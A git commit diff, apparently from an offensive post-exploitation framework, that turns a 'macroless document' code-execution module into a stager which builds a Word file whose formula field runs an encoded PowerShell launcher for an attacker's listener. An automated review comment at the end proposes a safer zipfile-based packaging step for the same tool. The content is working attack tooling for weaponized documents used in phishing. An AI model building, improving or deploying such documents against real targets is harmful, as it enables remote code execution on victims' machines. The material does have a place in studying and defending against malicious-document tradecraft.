moved the macroless word code exec from 'exploits' to 'stagers' per Xorrior

websockets-multiuser
root 2017-10-20 10:03:02 -04:00
parent 04e522700f
commit 51e98068bd
1 changed files with 66 additions and 85 deletions


@ -2,7 +2,7 @@
from lib.common import helpers
import os
class Module:
class Stager:
def __init__(self, mainMenu, params=[]):
@ -14,18 +14,6 @@ class Module:
'Description': ('Creates a macroless document utilizing a formula field for code execution'),
'Background' : False,
'OutputExtension' : "",
'NeedsAdmin' : False,
'OpsecSafe' : False,
'Language' : 'python',
'MinLanguageVersion' : '2.7',
'Comments': ["Hard work by Etienne Stalmas and Saif El-Sherei"]
}
@ -33,12 +21,6 @@ class Module:
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute on.',
'Required' : True,
'Value' : ''
},
'Listener' : {
'Description' : 'Listener to use for the payload.',
'Required' : True,
@ -90,7 +72,7 @@ class Module:
ps1 = self.options['OutputPs1']['Value']
if not self.mainMenu.listeners.is_listener_valid(listener):
print helpers.color("[!] Invalide listener: " + listener)
print helpers.color("[!] Invalid listener: " + listener)
return ""
else:
launcher = self.mainMenu.stagers.generate_launcher(listener, language='powershell', encode=True)
@ -117,6 +99,7 @@ class Module:
docProps_app = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>Normal.dotm</Template><TotalTime>2</TotalTime><Pages>1</Pages><Words>12</Words><Characters>70</Characters><Application>Microsoft Office Word</Application><DocSecurity>0</DocSecurity><Lines>1</Lines><Paragraphs>1</Paragraphs><ScaleCrop>false</ScaleCrop><HeadingPairs><vt:vector size="2" baseType="variant"><vt:variant><vt:lpstr>Title</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></HeadingPairs><TitlesOfParts><vt:vector size="1" baseType="lpstr"><vt:lpstr></vt:lpstr></vt:vector></TitlesOfParts><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>81</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>16.0000</AppVersion></Properties>"""
f = open(outdir + "docProps/app.xml", 'w')
f.write(docProps_app)
@ -128,6 +111,7 @@ class Module:
word_rels = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships>"""
f = open(outdir + "word/_rels/document.xml.rels", 'w')
f.write(word_rels)
@ -181,10 +165,7 @@ class Module:
craft_ps(output_path, launcher, ps1)
craft_exploit(output_path, host, ps1)
# very hacky
os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx))
print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path))
# very hacky to avoid 'no script returned' message
return "import sys"
return os.system("cd %s && zip %s%s -r [Content_Types].xml docProps/ _rels word && rm -rf [Content_Types].xml docProps/ _rels/ word/ && cd -" % (output_path, output_path, output_docx))
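Review bot: The new `return os.system(...)` line still builds a shell pipeline by %-interpolating `output_path` and `output_docx`, so an option value containing a space or a shell metacharacter breaks the `zip` step and misdirects the `rm -rf` that runs after it; on top of that the commit now returns `os.system`'s integer exit status where the old code returned a string (`"import sys"`), and the earlier `return ""` on the invalid-listener branch suggests callers treat the generate result as text, so the new return type is presumably unexpected and worth confirming against the stager loader. The hunk also drops the `[+] ... was created` status line, which is the only feedback the operator gets that the files landed in `output_path`. Both problems go away if the archive is built with `zipfile` and the staging directories removed with `shutil.rmtree`, as sketched below (`zipfile` and `shutil` would need importing at the top of the file, outside this hunk); the enclosing method's signature is also outside the hunk.
```python
craft_ps(output_path, launcher, ps1)
craft_exploit(output_path, host, ps1)
# Assemble the .docx with zipfile rather than an interpolated shell pipeline,
# so output_path / output_docx are never parsed by a shell.
parts = ['[Content_Types].xml', 'docProps', '_rels', 'word']
with zipfile.ZipFile(os.path.join(output_path, output_docx), 'w', zipfile.ZIP_DEFLATED) as zf:
    for part in parts:
        full = os.path.join(output_path, part)
        if os.path.isfile(full):
            zf.write(full, part)
            continue
        for root, _dirs, files in os.walk(full):
            for name in files:
                path = os.path.join(root, name)
                zf.write(path, os.path.relpath(path, output_path))
# Clean up the unpacked package parts without spawning a shell.
for part in parts:
    full = os.path.join(output_path, part)
    if os.path.isdir(full):
        shutil.rmtree(full)
    elif os.path.exists(full):
        os.remove(full)
print helpers.color("[+] '%s' and '%s' was created in the '%s' directory" % (output_docx, ps1, output_path))
# TODO(review): confirm what the stager loader expects back from generate();
# the invalid-listener branch returns "" and the previous code returned a
# script string here, not an exit status.
return ""
```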